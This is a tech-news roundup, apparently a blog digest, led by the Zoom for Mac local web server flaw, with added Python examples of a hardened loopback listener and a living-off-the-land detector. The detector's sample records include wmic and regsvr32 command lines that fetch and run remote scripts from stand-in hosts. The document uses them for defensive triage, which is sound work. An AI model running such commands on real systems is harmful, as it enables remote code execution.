The Zoom video conferencing app for Mac has serious flaws that remain unaddressed despite responsible disclosure. Simply visiting a malicious website can activate your camera without permission, and if you have uninstalled Zoom, a malicious site can reinstall it without any interaction from you.

Security researcher Jonathan Leitschuh noticed that Zoom can auto-join and start a video session when you do nothing more than visit a link. He wondered how the company accomplished that securely and investigated. He quickly found out that Zoom's methods weren't secure at all.

When you install Zoom on a Mac, it creates a web server on your machine. The web server is problematic on multiple levels. With very little effort, Leitschuh put together a proof-of-concept website. If you have Zoom installed and visit that website, you are auto-joined to a call and your webcam is activated without any interaction on your part, even if you closed Zoom before clicking the link.

Worse yet, uninstalling Zoom doesn't remove the web server, and the web server can reinstall Zoom on its own. So if you visit a malicious link, it can reinstall Zoom, join you to a call, and start your webcam, all without any interaction from you.

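To make the mechanism concrete, here is a toy model of why a loopback web server that does not authenticate its caller can be driven from any website, next to a hardened version of the same endpoint. This is an example added to this page, not Zoom's own code: the request type, the `/join` path, the `confno` parameter, the `X-Local-Token` header and the origins are all assumptions made for the illustration.

```python
"""Toy model of the local-web-server problem described above.

Constructed illustration, not Zoom's code. A loopback HTTP listener is
reachable by every process on the machine, and that includes a browser tab
rendering an attacker's page: an <img> or fetch() aimed at
http://localhost:<port>/join?... arrives exactly like a request from the
legitimate client. The hardened handler checks the browser's Origin header
and demands a per-install secret that a foreign web page cannot know.
"""
import secrets
from typing import Dict, Optional


class Request:
    """Minimal stand-in for an HTTP request reaching a loopback port."""

    def __init__(self, path: str, origin: Optional[str] = None,
                 headers: Optional[Dict[str, str]] = None) -> None:
        self.path = path
        self.origin = origin          # browser Origin header, None if absent
        self.headers = headers or {}


def vulnerable_handle(req: Request) -> str:
    """Acts on whatever arrives on localhost, whoever sent it."""
    if req.path.startswith("/join"):
        return "joined call, camera on"
    return "ignored"


class HardenedListener:
    """Same endpoint, but the caller has to prove it is the local client."""

    def __init__(self, allowed_origins) -> None:
        self.allowed_origins = set(allowed_origins)
        # Minted at install time and stored in a user-only file that the
        # legitimate client reads; web content on another origin cannot.
        self.token = secrets.token_urlsafe(32)

    def handle(self, req: Request) -> str:
        # Browsers attach Origin to cross-origin fetch()/XHR and page script
        # cannot alter it, so a foreign origin is rejected outright.
        if req.origin is not None and req.origin not in self.allowed_origins:
            return "rejected: untrusted origin"
        # <img> loads and plain navigations carry no Origin at all, so the
        # shared secret is the check that actually gates the action.
        supplied = req.headers.get("X-Local-Token", "")
        if not secrets.compare_digest(supplied, self.token):
            return "rejected: missing or bad token"
        if req.path.startswith("/join"):
            return "joined call after user confirmation"
        return "ignored"


def demo() -> Dict[str, str]:
    """Run both handlers against the same constructed requests."""
    listener = HardenedListener(allowed_origins={"https://app.example.invalid"})
    # A page on an attacker-controlled origin calls the listener via fetch().
    evil = Request("/join?confno=123456789", origin="https://evil.example.invalid")
    # An <img src="http://localhost:.../join?..."> load: no Origin, no token.
    img = Request("/join?confno=123456789")
    # The legitimate local client: trusted origin plus the install secret.
    good = Request("/join?confno=123456789",
                   origin="https://app.example.invalid",
                   headers={"X-Local-Token": listener.token})
    return {
        "vulnerable_evil": vulnerable_handle(evil),
        "vulnerable_img": vulnerable_handle(img),
        "hardened_evil": listener.handle(evil),
        "hardened_img": listener.handle(img),
        "hardened_good": listener.handle(good),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:16} -> {outcome}")
```

The point of the token is that loopback reachability is not authorization: anything a browser can be tricked into requesting, a local listener will receive, so the listener itself has to decide who it trusts.
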
You can test this with Leitschuh's proof of concept, but be advised that if you have Zoom installed, your camera will start and you'll find yourself joined to a call with other people testing the site. Leitschuh notified Zoom of his findings and gave the company a 90-day disclosure window. Unfortunately, the company didn't do much to fix the problem.

Initially, the company brushed the whole thing off as intended behavior, since auto-join is a feature it supports. Zoom eventually implemented a partial fix that stops the camera from turning on automatically, but malicious actors can still force users to join a call and reinstall Zoom. [Medium]

In Other News:

  • Microsoft is sneaking ads into Android: If you have a Microsoft Android app installed, you might see ads for other Microsoft apps. But not inside the app itself. Microsoft is inserting suggestions in Android's share and open menus. If you share a photo with a friend, you might see OneDrive listed, even if you didn't install it. Tapping OneDrive takes you to the Play Store. Subtle yet gross. [Android Police]

  • Apple announced a new MacBook Lineup: Apple is shaking things up in the MacBook world: gone are the MacBook model and the non-Touchbar MacBook Pro models. But as they leave, a less expensive MacBook Air with an improved screen takes center stage. We think this is the most sensible lineup in years. We also believe you should wait on buying a MacBook anyway, because of the ongoing keyboard issues. [ReviewGeek]

  • Microsoft issued a warning about hard-to-detect malware: Microsoft discovered a malware campaign, dubbed Astaroth, that uses advanced techniques to evade discovery. Astaroth relies on legitimate system tools, like the Windows Management Instrumentation Command-line (WMIC) tool, to do its work and masquerade as normal system activity (a Living off the Land technique). And it never writes its payload to disk, instead executing entirely in memory (a fileless method). Astaroth is delivered through spam email with malicious links, so be careful what you click. [ZDNet]

  • Over 1,000 Android apps ignore your permissions choices and track you anyway: Security researchers discovered that many Android apps track you even when you deny the permissions meant to prevent it. Most use workarounds; for instance, Shutterfly pulls GPS coordinates from the metadata of your photos. Some even pass data from one app to another. Android Q should solve the problem, but Android isn't known for timely updates. [9to5Google]

  • Instagram wants to stop bullying: Instagram is testing new features designed to curtail bullying on its platform. The first is an A.I. process that detects when you are writing something disparaging and asks whether you truly want to post the comment. The second lets users shadowban commenters: a shadowban hides the commenter's posts from everyone except the commenter, without notifying them. [Instagram]

  • Spotify Lite is smaller, with fewer features: Spotify’s new Lite app for Android is a svelte 10MB in size, which is great for devices with limited storage and countries with slower internet speeds. Of course, the smaller size means fewer features. But you still get the most important part, music, which is really all that matters. While it’s available now in 36 markets around the world, the US isn’t one of them. [Engadget]

  • Google says you get to keep your Stadia Games: Google Stadia is incredibly intriguing. But one question (ok many questions) loomed heavily: what happens if a game publisher stops supporting Stadia? Do you lose the game despite the money you spent? Google updated its FAQ, and it promises you’ll keep your games in that event “barring unforeseen circumstances” (because every company wants wiggle room). [The Verge]

  • Microsoft’s weird tweets were just a Stranger Things ad: Microsoft’s tweets have been “strange” lately, touting Windows 1.0 and other throwbacks. The references to 1985 made it a likely Stranger Things tie-in (a show set in 1985), and now that’s confirmed with a theme pack and Windows 1.11 app download. If you like things ugly, and really love Paint, download them now. [Ars Technica]

  • YouTube returns to FireTV and Prime Video gets Chromecast support: Google removed YouTube from FireTV as the two companies fought about representation in each other’s stores. The companies promised peace, and it seems that’s finally coming to pass. You’ll now find YouTube on most FireTV devices (save for the Echo Show). Also starting today, Prime Video will get Chromecast support. What a time to be alive. [GeekWire]

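The Astaroth item above turns on two techniques: a trusted system tool does the work, and nothing is written to disk. A fileless chain leaves no file for a scanner to inspect, so process-creation telemetry (which binary ran, with what command line, launched by what) is where defenders look. The following is an added example, not Microsoft's detection logic and not Astaroth's actual command lines: a small scan over constructed Sysmon-style process-creation records that flags a Windows system binary handed a remote URL, or launched by a browser or Office application. The record format, the sample lines and both binary lists are the example's own assumptions.

```python
"""Living-off-the-land triage over constructed process-creation events.

Example added for this page; not Microsoft's detection logic and not a
record of what Astaroth really runs. The event format, the sample lines
and the heuristics are assumptions. Because a fileless chain writes no
payload to disk, the command line and parent process are the evidence
that survives, so that is what this looks at.
"""
import re
from typing import Dict, List

# System binaries routinely repurposed to fetch or run attacker content.
# The set is this example's own choice, not a list taken from the page.
LOLBINS = {"wmic.exe", "regsvr32.exe", "mshta.exe", "rundll32.exe",
           "bitsadmin.exe", "certutil.exe"}

# Parents that should rarely launch the tools above directly.
USER_FACING_PARENTS = {"winword.exe", "excel.exe", "outlook.exe",
                       "chrome.exe", "msedge.exe", "firefox.exe"}

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed Sysmon-style "process create" records as '|'-separated
# key=value pairs. Lines 1, 3 and 5 are the ones a human would want to see.
SAMPLE_LINES = [
    r'Image=C:\Windows\System32\wbem\WMIC.exe|CommandLine=wmic os get /format:"https://cdn.example.invalid/x.xsl"|ParentImage=C:\Windows\explorer.exe',
    r'Image=C:\Windows\System32\wbem\WMIC.exe|CommandLine=wmic csproduct get name|ParentImage=C:\Windows\System32\cmd.exe',
    r'Image=C:\Windows\System32\regsvr32.exe|CommandLine=regsvr32 /s /n /u /i:https://cdn.example.invalid/s.sct scrobj.dll|ParentImage=C:\Windows\System32\cmd.exe',
    r'Image=C:\Windows\System32\notepad.exe|CommandLine=notepad C:\Users\alice\notes.txt|ParentImage=C:\Windows\explorer.exe',
    r'Image=C:\Windows\System32\mshta.exe|CommandLine=mshta C:\Users\alice\Downloads\invoice.hta|ParentImage=C:\Program Files\Google\Chrome\Application\chrome.exe',
]


def parse_event(line: str) -> Dict[str, str]:
    """Split one record into a field dict (the format is this example's own)."""
    return dict(kv.split("=", 1) for kv in line.split("|"))


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event looks like LotL abuse (empty = benign)."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    reasons: List[str] = []
    # A trusted binary pulling content from the network is the core pattern:
    # the tool is legitimate, the place it is told to fetch from is not.
    if image in LOLBINS and URL_RE.search(cmd):
        reasons.append("system tool given a remote URL")
    # Mail clients, Office and browsers are where a spam link lands; they
    # have no business spawning these tools directly.
    if image in LOLBINS and parent in USER_FACING_PARENTS:
        reasons.append("system tool spawned by a browser or Office app")
    return reasons


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run every record through classify() and keep the ones with reasons."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        event = parse_event(line)
        reasons = classify(event)
        if reasons:
            hits.append({"image": basename(event.get("Image", "")),
                         "command": event.get("CommandLine", ""),
                         "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES):
        print(f"{hit['image']:14} {'; '.join(hit['reasons'])}")
        print(f"{'':14} {hit['command']}")
```

Heuristics like these are a triage filter, not a verdict: administrators do run wmic and certutil by hand, so in practice the flagged events get baselined against what is normal for the environment before anyone is paged.
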
Touchscreens, with virtual buttons that reconfigure based on your needs, are a fantastic technology that transformed the way we live. That is, unless you are blind. Touchscreens are an awkward technology for anyone without sight: the buttons lack the tactile feedback needed to find them and determine what they do.

Researchers want to solve that and other problems. They're working on an electronic skin that could interact with touchscreens to provide tactile sensations. Think of it like your phone's vibrations, but on a smaller scale that gives you a sense of which direction to move your finger or how hard to press.

The idea is to keep the material thin enough that you can feel through it with your finger, yet still embed circuits that can interact with other technology and with you. Scientists hope that one day electronic skin could add the feeling of touch to a prosthetic hand as well. There's still a long way to go before this happens, but now it truly seems possible and not just something in the realm of science fiction. That's true progress. [Phys.org]

